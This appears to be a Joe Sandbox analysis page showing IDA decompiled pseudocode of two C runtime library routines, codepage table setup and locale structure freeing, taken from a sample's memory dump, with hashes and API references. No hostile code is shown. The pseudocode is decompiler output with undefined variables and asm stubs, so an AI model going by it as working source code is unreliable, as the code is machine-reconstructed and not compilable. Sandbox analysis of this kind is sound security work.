                                                                                                                                                                          • Instruction ID: b204cbb04878976925027393ea16626ca1d122c98afc28e5c5e8259b73b2fb0d
                                                                                                                                                                          • Opcode Fuzzy Hash: a5723d95812905f6a1b6f5161af862748f6307f263e14757bb905799d683a281
                                                                                                                                                                          • Instruction Fuzzy Hash: 07E08C3291122CEBCB14DBCCEA0498AF7ECEB44B14B114196F501E3190D270DE01C7D4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 009FE675 Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                          			E009FE675(void* __edx, intOrPtr* _a4) {
				signed int _v8;
				char _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				signed int _v64;
				signed int* _v68;
				intOrPtr _v72;
				signed int* _v76;
				signed int** _v80;
				signed int** _v84;
				void* _v88;
				char _v92;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t126;
				signed int* _t129;
				intOrPtr* _t131;
				signed int* _t147;
				signed short _t150;
				signed int _t151;
				void* _t153;
				void* _t156;
				void* _t159;
				void* _t160;
				void* _t164;
				signed int _t165;
				signed int* _t166;
				signed char _t183;
				signed int* _t186;
				void* _t190;
				char _t195;
				signed char _t197;
				void* _t204;
				signed int* _t205;
				void* _t207;
				signed int* _t209;
				void* _t212;
				intOrPtr _t213;
				intOrPtr _t217;
				signed int* _t221;
				intOrPtr _t222;
				signed int _t223;
				void* _t227;
				signed int _t230;
				char* _t231;
				intOrPtr _t232;
				signed int* _t235;
				signed char* _t236;
				signed int** _t239;
				signed int** _t240;
				signed char* _t249;
				void* _t251;
				intOrPtr* _t252;
				void* _t255;
				signed int _t256;
				short* _t257;
				signed int _t260;
				signed int _t261;
				void* _t262;
				void* _t263;

				_t233 = __edx;
				_t126 =  *0xa44bac; // 0x96877b9b
				_v8 = _t126 ^ _t261;
				_t252 = _a4;
				_t205 = 0;
				_v56 = _t252;
				_t237 = 0;
				_v32 = 0;
				_t213 =  *((intOrPtr*)(_t252 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v92 = _t252;
				_v88 = 0;
				if(_t213 == 0) {
					__eflags =  *(_t252 + 0x8c);
					if( *(_t252 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t252 + 0x8c) = _t205;
					_t129 = 0;
					__eflags = 0;
					 *(_t252 + 0x90) = _t205;
					 *_t252 = 0xa16978;
					 *(_t252 + 0x94) = 0xa16bf8;
					 *(_t252 + 0x98) = 0xa16d78;
					 *(_t252 + 4) = 1;
					L48:
					return E009F8F7D(_t129, _t205, _v8 ^ _t261, _t233, _t237, _t252);
				}
				_t131 = _t252 + 8;
				_v52 = 0;
				if( *_t131 != 0) {
					L3:
					_v52 = E00A04422(1, 4);
					E00A0447F(_t205);
					_v32 = E00A04422(0x180, 2);
					E00A0447F(_t205);
					_t237 = E00A04422(0x180, 1);
					_v44 = _t237;
					E00A0447F(_t205);
					_v36 = E00A04422(0x180, 1);
					E00A0447F(_t205);
					_v40 = E00A04422(0x101, 1);
					E00A0447F(_t205);
					_t263 = _t262 + 0x3c;
					if(_v52 == _t205 || _v32 == _t205) {
						L43:
						E00A0447F(_v52);
						E00A0447F(_v32);
						E00A0447F(_t237);
						E00A0447F(_v36);
						_t205 = 1;
						__eflags = 1;
						goto L44;
					} else {
						_t217 = _v40;
						if(_t217 == 0 || _t237 == 0 || _v36 == _t205) {
							goto L43;
						} else {
							_t147 = _t205;
							do {
								 *(_t147 + _t217) = _t147;
								_t147 =  &(_t147[0]);
							} while (_t147 < 0x100);
							if(GetCPInfo( *(_t252 + 8),  &_v28) == 0) {
								goto L43;
							}
							_t150 = _v28;
							if(_t150 > 5) {
								goto L43;
							}
							_t151 = _t150 & 0x0000ffff;
							_v60 = _t151;
							if(_t151 <= 1) {
								L22:
								_t37 = _t237 + 0x81; // 0x81
								_t233 = 0xff;
								_v48 = _v40 + 1;
								_t153 = E00A073F7(_t281, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x100, _v40 + 1, 0xff, _t37, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t282 = _t153;
								if(_t153 == 0) {
									goto L43;
								}
								_t156 = E00A073F7(_t282, _t205,  *((intOrPtr*)(_t252 + 0xa8)), 0x200, _v48, 0xff, _v36 + 0x81, 0xff,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x24;
								_t283 = _t156;
								if(_t156 == 0) {
									goto L43;
								}
								_v72 = _v32 + 0x100;
								_t159 = E00A0710A(_t283, _t205, 1, _v40, 0x100, _v32 + 0x100,  *(_t252 + 8), _t205);
								_t263 = _t263 + 0x1c;
								if(_t159 == 0) {
									goto L43;
								}
								_t160 = _v32;
								_t221 = _t160 + 0xfe;
								 *_t221 = 0;
								_t233 = _v44;
								_v76 = _t221;
								_t222 = _v36;
								_t239 = _t233 + 0x80;
								 *(_t233 + 0x7f) = _t205;
								_v80 = _t239;
								 *(_t222 + 0x7f) = _t205;
								 *_t239 = _t205;
								_t240 = _t222 + 0x80;
								_v84 = _t240;
								 *_t240 = _t205;
								if(_v60 <= 1) {
									L39:
									_t223 = 0x3f;
									_push(0x1f);
									memcpy(_v32, _v32 + 0x200, _t223 << 2);
									asm("movsw");
									_t164 = memcpy(_t233, _t233 + 0x100, 0 << 2);
									_t227 = 0x1f;
									asm("movsw");
									asm("movsb");
									_t255 = _t164 + 0x100;
									_t165 = memcpy(_t164, _t255, 0 << 2);
									_t237 = _t255 + _t227 + _t227;
									asm("movsw");
									asm("movsb");
									_t252 = _v56;
									if( *(_t252 + 0x8c) != 0) {
										asm("lock xadd [ecx], eax");
										if((_t165 | 0xffffffff) == 0) {
											E00A0447F( *(_t252 + 0x90) - 0xfe);
											_t237 = 0x80;
											E00A0447F( *(_t252 + 0x94) - 0x80);
											E00A0447F( *(_t252 + 0x98) - 0x80);
											E00A0447F( *(_t252 + 0x8c));
										}
									}
									_t166 = _v52;
									 *_t166 = 1;
									 *(_t252 + 0x8c) = _t166;
									 *_t252 = _v72;
									 *(_t252 + 0x90) = _v76;
									 *(_t252 + 0x94) = _v80;
									 *(_t252 + 0x98) = _v84;
									 *(_t252 + 4) = _v60;
									L44:
									E00A0447F(_v40);
									_t129 = _t205;
									goto L48;
								}
								if( *(_t252 + 8) != 0xfde9) {
									_t249 =  &_v22;
									__eflags = _v22 - _t205;
									if(_v22 == _t205) {
										goto L39;
									}
									_t207 = _v32;
									while(1) {
										_t183 = _t249[1];
										__eflags = _t183;
										if(_t183 == 0) {
											break;
										}
										_t256 =  *_t249 & 0x000000ff;
										_v64 = _t256;
										__eflags = _t256 - (_t183 & 0x000000ff);
										if(_t256 > (_t183 & 0x000000ff)) {
											L37:
											_t249 =  &(_t249[2]);
											__eflags =  *_t249;
											if( *_t249 != 0) {
												continue;
											}
											break;
										}
										_v48 = _t233;
										_t186 = _t222 + 0x80 + _t256;
										_t235 = _t233 - _t222;
										__eflags = _t235;
										_t230 = _v64;
										_t257 = _t207 - 0xffffff00 + _t256 * 2;
										_v68 = _t186;
										_t209 = _t186;
										do {
											 *_t257 = 0x8000;
											_t257 = _t257 + 2;
											 *(_t235 + _t209) = _t230;
											 *_t209 = _t230;
											_t230 = _t230 + 1;
											_t209 =  &(_t209[0]);
											__eflags = _t230 - (_t249[1] & 0x000000ff);
										} while (_t230 <= (_t249[1] & 0x000000ff));
										_t233 = _v44;
										_t222 = _v36;
										_t207 = _v32;
										goto L37;
									}
									L38:
									_t205 = 0;
									goto L39;
								}
								_v44 = _t160 + 0x200;
								_t231 = _t233 + 0x100;
								_t251 = _t222 - _t233;
								_t190 = 0xffffff80;
								_v48 = _t190 - _t233;
								do {
									_push(0x32);
									asm("sbb eax, eax");
									_v44 = _v44 + 2;
									 *_v44 = (0xfffffebe + _t231 & 0xffff8000) + 0x8000;
									_t212 = _v48;
									_t195 = _t231 + _t212;
									 *_t231 = _t195;
									 *((char*)(_t251 + _t231)) = _t195;
									_t231 = _t231 + 1;
								} while (_t212 + _t231 <= 0xff);
								goto L38;
							}
							_t281 =  *(_t252 + 8) - 0xfde9;
							if( *(_t252 + 8) != 0xfde9) {
								_t236 =  &_v22;
								__eflags = _v22 - _t205;
								if(__eflags == 0) {
									goto L22;
								}
								_t232 = _v40;
								while(1) {
									_t197 = _t236[1];
									__eflags = _t197;
									if(__eflags == 0) {
										break;
									}
									_t260 =  *_t236 & 0x000000ff;
									__eflags = _t260 - (_t197 & 0x000000ff);
									if(_t260 > (_t197 & 0x000000ff)) {
										L20:
										_t236 =  &(_t236[2]);
										__eflags =  *_t236 - _t205;
										if(__eflags != 0) {
											continue;
										}
										break;
									} else {
										goto L19;
									}
									do {
										L19:
										 *((char*)(_t260 + _t232)) = 0x20;
										_t260 = _t260 + 1;
										__eflags = _t260 - (_t236[1] & 0x000000ff);
									} while (_t260 <= (_t236[1] & 0x000000ff));
									goto L20;
								}
								_t252 = _v56;
								goto L22;
							}
							E009FA270(_t237, _v40 - 0xffffff80, 0x20, 0x80);
							_t263 = _t263 + 0xc;
							goto L22;
						}
					}
				}
				_push(_t131);
				_push(0x1004);
				_push(_t213);
				_push(0);
				_push( &_v92);
				_t204 = E00A06F5A(__edx);
				_t263 = _t262 + 0x14;
				if(_t204 != 0) {
					goto L43;
				}
				goto L3;
			}







































































                                                                                                                                                                          0x009fe675
                                                                                                                                                                          0x009fe67d
                                                                                                                                                                          0x009fe684
                                                                                                                                                                          0x009fe689
                                                                                                                                                                          0x009fe68c
                                                                                                                                                                          0x009fe68f
                                                                                                                                                                          0x009fe692
                                                                                                                                                                          0x009fe694
                                                                                                                                                                          0x009fe697
                                                                                                                                                                          0x009fe69d
                                                                                                                                                                          0x009fe6a0
                                                                                                                                                                          0x009fe6a3
                                                                                                                                                                          0x009fe6a6
                                                                                                                                                                          0x009fe6ab
                                                                                                                                                                          0x009fea8e
                                                                                                                                                                          0x009fea90
                                                                                                                                                                          0x009fea92
                                                                                                                                                                          0x009fea92
                                                                                                                                                                          0x009fea95
                                                                                                                                                                          0x009fea9b
                                                                                                                                                                          0x009fea9b
                                                                                                                                                                          0x009fea9d
                                                                                                                                                                          0x009feaa3
                                                                                                                                                                          0x009feaa9
                                                                                                                                                                          0x009feab3
                                                                                                                                                                          0x009feabd
                                                                                                                                                                          0x009feac4
                                                                                                                                                                          0x009fead2
                                                                                                                                                                          0x009fead2
                                                                                                                                                                          0x009fe6b1
                                                                                                                                                                          0x009fe6b4
                                                                                                                                                                          0x009fe6b9
                                                                                                                                                                          0x009fe6d7
                                                                                                                                                                          0x009fe6e1
                                                                                                                                                                          0x009fe6e4
                                                                                                                                                                          0x009fe6f7
                                                                                                                                                                          0x009fe6fa
                                                                                                                                                                          0x009fe707
                                                                                                                                                                          0x009fe70a
                                                                                                                                                                          0x009fe70d
                                                                                                                                                                          0x009fe71f
                                                                                                                                                                          0x009fe722
                                                                                                                                                                          0x009fe734
                                                                                                                                                                          0x009fe737
                                                                                                                                                                          0x009fe73c
                                                                                                                                                                          0x009fe742
                                                                                                                                                                          0x009fea57
                                                                                                                                                                          0x009fea5a
                                                                                                                                                                          0x009fea62
                                                                                                                                                                          0x009fea68
                                                                                                                                                                          0x009fea70
                                                                                                                                                                          0x009fea7a
                                                                                                                                                                          0x009fea7a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe751
                                                                                                                                                                          0x009fe751
                                                                                                                                                                          0x009fe756
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe76d
                                                                                                                                                                          0x009fe76d
                                                                                                                                                                          0x009fe76f
                                                                                                                                                                          0x009fe76f
                                                                                                                                                                          0x009fe772
                                                                                                                                                                          0x009fe773
                                                                                                                                                                          0x009fe789
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe78f
                                                                                                                                                                          0x009fe795
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe79b
                                                                                                                                                                          0x009fe79e
                                                                                                                                                                          0x009fe7a4
                                                                                                                                                                          0x009fe7fa
                                                                                                                                                                          0x009fe7fd
                                                                                                                                                                          0x009fe807
                                                                                                                                                                          0x009fe81c
                                                                                                                                                                          0x009fe820
                                                                                                                                                                          0x009fe825
                                                                                                                                                                          0x009fe828
                                                                                                                                                                          0x009fe82a
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe853
                                                                                                                                                                          0x009fe858
                                                                                                                                                                          0x009fe85b
                                                                                                                                                                          0x009fe85d
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe878
                                                                                                                                                                          0x009fe87e
                                                                                                                                                                          0x009fe883
                                                                                                                                                                          0x009fe888
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe88e
                                                                                                                                                                          0x009fe897
                                                                                                                                                                          0x009fe89d
                                                                                                                                                                          0x009fe8a0
                                                                                                                                                                          0x009fe8a3
                                                                                                                                                                          0x009fe8a6
                                                                                                                                                                          0x009fe8a9
                                                                                                                                                                          0x009fe8af
                                                                                                                                                                          0x009fe8b2
                                                                                                                                                                          0x009fe8b5
                                                                                                                                                                          0x009fe8b8
                                                                                                                                                                          0x009fe8ba
                                                                                                                                                                          0x009fe8c0
                                                                                                                                                                          0x009fe8c3
                                                                                                                                                                          0x009fe8c5
                                                                                                                                                                          0x009fe995
                                                                                                                                                                          0x009fe99c
                                                                                                                                                                          0x009fe99d
                                                                                                                                                                          0x009fe9a8
                                                                                                                                                                          0x009fe9ad
                                                                                                                                                                          0x009fe9b7
                                                                                                                                                                          0x009fe9b9
                                                                                                                                                                          0x009fe9ba
                                                                                                                                                                          0x009fe9bc
                                                                                                                                                                          0x009fe9bd
                                                                                                                                                                          0x009fe9c5
                                                                                                                                                                          0x009fe9c5
                                                                                                                                                                          0x009fe9c7
                                                                                                                                                                          0x009fe9c9
                                                                                                                                                                          0x009fe9ca
                                                                                                                                                                          0x009fe9d5
                                                                                                                                                                          0x009fe9da
                                                                                                                                                                          0x009fe9de
                                                                                                                                                                          0x009fe9ec
                                                                                                                                                                          0x009fe9f7
                                                                                                                                                                          0x009fe9ff
                                                                                                                                                                          0x009fea0d
                                                                                                                                                                          0x009fea18
                                                                                                                                                                          0x009fea1d
                                                                                                                                                                          0x009fe9de
                                                                                                                                                                          0x009fea20
                                                                                                                                                                          0x009fea23
                                                                                                                                                                          0x009fea29
                                                                                                                                                                          0x009fea32
                                                                                                                                                                          0x009fea37
                                                                                                                                                                          0x009fea40
                                                                                                                                                                          0x009fea49
                                                                                                                                                                          0x009fea52
                                                                                                                                                                          0x009fea7b
                                                                                                                                                                          0x009fea7e
                                                                                                                                                                          0x009fea84
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fea84
                                                                                                                                                                          0x009fe8d2
                                                                                                                                                                          0x009fe92b
                                                                                                                                                                          0x009fe92e
                                                                                                                                                                          0x009fe931
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe933
                                                                                                                                                                          0x009fe936
                                                                                                                                                                          0x009fe936
                                                                                                                                                                          0x009fe939
                                                                                                                                                                          0x009fe93b
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe93d
                                                                                                                                                                          0x009fe943
                                                                                                                                                                          0x009fe946
                                                                                                                                                                          0x009fe948
                                                                                                                                                                          0x009fe98b
                                                                                                                                                                          0x009fe98b
                                                                                                                                                                          0x009fe98e
                                                                                                                                                                          0x009fe991
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe991
                                                                                                                                                                          0x009fe950
                                                                                                                                                                          0x009fe959
                                                                                                                                                                          0x009fe95b
                                                                                                                                                                          0x009fe95b
                                                                                                                                                                          0x009fe95d
                                                                                                                                                                          0x009fe960
                                                                                                                                                                          0x009fe963
                                                                                                                                                                          0x009fe966
                                                                                                                                                                          0x009fe968
                                                                                                                                                                          0x009fe96d
                                                                                                                                                                          0x009fe970
                                                                                                                                                                          0x009fe973
                                                                                                                                                                          0x009fe976
                                                                                                                                                                          0x009fe978
                                                                                                                                                                          0x009fe97d
                                                                                                                                                                          0x009fe97e
                                                                                                                                                                          0x009fe97e
                                                                                                                                                                          0x009fe982
                                                                                                                                                                          0x009fe985
                                                                                                                                                                          0x009fe988
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe988
                                                                                                                                                                          0x009fe993
                                                                                                                                                                          0x009fe993
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe993
                                                                                                                                                                          0x009fe8db
                                                                                                                                                                          0x009fe8de
                                                                                                                                                                          0x009fe8eb
                                                                                                                                                                          0x009fe8ed
                                                                                                                                                                          0x009fe8f2
                                                                                                                                                                          0x009fe8f5
                                                                                                                                                                          0x009fe8f8
                                                                                                                                                                          0x009fe900
                                                                                                                                                                          0x009fe902
                                                                                                                                                                          0x009fe910
                                                                                                                                                                          0x009fe913
                                                                                                                                                                          0x009fe916
                                                                                                                                                                          0x009fe919
                                                                                                                                                                          0x009fe91b
                                                                                                                                                                          0x009fe91e
                                                                                                                                                                          0x009fe922
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe929
                                                                                                                                                                          0x009fe7a6
                                                                                                                                                                          0x009fe7ad
                                                                                                                                                                          0x009fe7c7
                                                                                                                                                                          0x009fe7ca
                                                                                                                                                                          0x009fe7cd
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe7cf
                                                                                                                                                                          0x009fe7d2
                                                                                                                                                                          0x009fe7d2
                                                                                                                                                                          0x009fe7d5
                                                                                                                                                                          0x009fe7d7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe7d9
                                                                                                                                                                          0x009fe7df
                                                                                                                                                                          0x009fe7e1
                                                                                                                                                                          0x009fe7f0
                                                                                                                                                                          0x009fe7f0
                                                                                                                                                                          0x009fe7f3
                                                                                                                                                                          0x009fe7f5
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe7e3
                                                                                                                                                                          0x009fe7e3
                                                                                                                                                                          0x009fe7e3
                                                                                                                                                                          0x009fe7e7
                                                                                                                                                                          0x009fe7ec
                                                                                                                                                                          0x009fe7ec
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe7e3
                                                                                                                                                                          0x009fe7f7
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe7f7
                                                                                                                                                                          0x009fe7bd
                                                                                                                                                                          0x009fe7c2
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x009fe7c2
                                                                                                                                                                          0x009fe756
                                                                                                                                                                          0x009fe742
                                                                                                                                                                          0x009fe6bb
                                                                                                                                                                          0x009fe6bc
                                                                                                                                                                          0x009fe6c1
                                                                                                                                                                          0x009fe6c5
                                                                                                                                                                          0x009fe6c6
                                                                                                                                                                          0x009fe6c7
                                                                                                                                                                          0x009fe6cc
                                                                                                                                                                          0x009fe6d1
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000
                                                                                                                                                                          0x00000000

                                                                                                                                                                          APIs
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$Info
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2509303402-0
                                                                                                                                                                          • Opcode ID: 0025efaf4f736d0315dc749db3feb290e9a6d8fd76dd823c4cd6d3325f60fda8
                                                                                                                                                                          • Instruction ID: 809aa16fe204526b5beeb96b2f616bdcd9d49d5dd0605a35000db0cf97598ac2
                                                                                                                                                                          • Opcode Fuzzy Hash: 0025efaf4f736d0315dc749db3feb290e9a6d8fd76dd823c4cd6d3325f60fda8
                                                                                                                                                                          • Instruction Fuzzy Hash: B8D1AE719003499FDB11DF78C881BFEBBF9BF08300F144569E699AB292D775A845CB60
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 00A0D8F4 Relevance: 19.6, APIs: 13, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                          			E00A0D8F4(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0xa44bf0) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E00A0447F(_t46);
							E00A0CBA0( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00A0447F(_t47);
							E00A0D054( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00A0447F( *((intOrPtr*)(_t74 + 0x7c)));
						E00A0447F( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00A0447F( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00A0447F( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00A0447F( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00A0447F( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00A0DA65( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xa44de8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00A0447F(_t31);
							E00A0447F( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00A0447F(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00A0447F(_t74);
			}















                                                                                                                                                                          0x00a0d8fc
                                                                                                                                                                          0x00a0d900
                                                                                                                                                                          0x00a0d908
                                                                                                                                                                          0x00a0d911
                                                                                                                                                                          0x00a0d916
                                                                                                                                                                          0x00a0d91d
                                                                                                                                                                          0x00a0d925
                                                                                                                                                                          0x00a0d92d
                                                                                                                                                                          0x00a0d938
                                                                                                                                                                          0x00a0d93e
                                                                                                                                                                          0x00a0d93f
                                                                                                                                                                          0x00a0d947
                                                                                                                                                                          0x00a0d94f
                                                                                                                                                                          0x00a0d95a
                                                                                                                                                                          0x00a0d960
                                                                                                                                                                          0x00a0d964
                                                                                                                                                                          0x00a0d96f
                                                                                                                                                                          0x00a0d975
                                                                                                                                                                          0x00a0d916
                                                                                                                                                                          0x00a0d976
                                                                                                                                                                          0x00a0d97e
                                                                                                                                                                          0x00a0d991
                                                                                                                                                                          0x00a0d9a4
                                                                                                                                                                          0x00a0d9b2
                                                                                                                                                                          0x00a0d9bd
                                                                                                                                                                          0x00a0d9c2
                                                                                                                                                                          0x00a0d9cb
                                                                                                                                                                          0x00a0d9d3
                                                                                                                                                                          0x00a0d9d4
                                                                                                                                                                          0x00a0d9da
                                                                                                                                                                          0x00a0d9dd
                                                                                                                                                                          0x00a0d9e0
                                                                                                                                                                          0x00a0d9e7
                                                                                                                                                                          0x00a0d9e9
                                                                                                                                                                          0x00a0d9ed
                                                                                                                                                                          0x00a0d9f5
                                                                                                                                                                          0x00a0d9fc
                                                                                                                                                                          0x00a0da02
                                                                                                                                                                          0x00a0da03
                                                                                                                                                                          0x00a0da03
                                                                                                                                                                          0x00a0da0a
                                                                                                                                                                          0x00a0da0c
                                                                                                                                                                          0x00a0da11
                                                                                                                                                                          0x00a0da19
                                                                                                                                                                          0x00a0da1e
                                                                                                                                                                          0x00a0da1f
                                                                                                                                                                          0x00a0da1f
                                                                                                                                                                          0x00a0da22
                                                                                                                                                                          0x00a0da25
                                                                                                                                                                          0x00a0da28
                                                                                                                                                                          0x00a0da2b
                                                                                                                                                                          0x00a0da2b
                                                                                                                                                                          0x00a0da3b

                                                                                                                                                                          APIs
                                                                                                                                                                          • ___free_lconv_mon.LIBCMT ref: 00A0D938
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CBBD
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CBCF
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CBE1
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CBF3
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CC05
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CC17
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CC29
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CC3B
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CC4D
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CC5F
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CC71
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CC83
                                                                                                                                                                            • Part of subcall function 00A0CBA0: _free.LIBCMT ref: 00A0CC95
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D92D
                                                                                                                                                                            • Part of subcall function 00A0447F: HeapFree.KERNEL32(00000000,00000000,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?), ref: 00A04495
                                                                                                                                                                            • Part of subcall function 00A0447F: GetLastError.KERNEL32(?,?,00A0D2F5,?,00000000,?,00000002,?,00A0D598,?,00000007,?,?,00A0DA8B,?,?), ref: 00A044A7
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D94F
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D964
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D96F
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D991
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D9A4
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D9B2
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D9BD
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D9F5
                                                                                                                                                                          • _free.LIBCMT ref: 00A0D9FC
                                                                                                                                                                          • _free.LIBCMT ref: 00A0DA19
                                                                                                                                                                          • _free.LIBCMT ref: 00A0DA31
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.312867160.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.312856202.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312888799.0000000000A14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312904957.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312912092.0000000000A23000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000000.00000002.312935306.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
